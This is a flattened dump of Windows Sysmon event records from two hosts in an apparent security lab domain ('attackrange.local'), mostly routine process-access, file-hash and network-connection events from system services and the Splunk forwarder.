08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:20.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A10772D410EE58663BBE2ADBBD084FE,SHA256=528615C3FE93D3B69E371883228F403749FA3E89A36048253BAC14CFC87215D9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:22.975{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBE35EE90ECA29DCBB29CA49FA637A3A,SHA256=9D803D0928D34AE765AD96C16785043A8C036D3E0788F51FD767A74E78134AFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:22.681{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77A5CEE91F4AFA9075D84874E4AA4E89,SHA256=45F733FE3BDB128BBB98AE4E594CF833C4C67AFFA3D86010120E00A851936CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:22.681{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCA32887F1069A78621F67EAC4DA2558,SHA256=4C95574E417B94B0360694CAFD8CB879FC24D1664001222CEB6C53D673361002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:22.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E623C005FB90B0FAB358AD5241589002,SHA256=D0A044603817F0FBA70AB2A60A59E934D00F0901DC52CD750C75155D12F12103,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:20.937{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57432-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000809899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:21.961{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-25420-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001053679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:23.049{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB93839669123367FE9FBBDA60875167,SHA256=AB56F5A8520ADFBEC60002CF25FD753C12602AE5EE4BA3E2B39E45616E29C46F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C4-60EB-CF79-00000000D001}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F7C4-60EB-CF79-00000000D001}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C4-60EB-CF79-00000000D001}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.976{0C1E0330-F7C4-60EB-CF79-00000000D001}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C4-60EB-CE79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 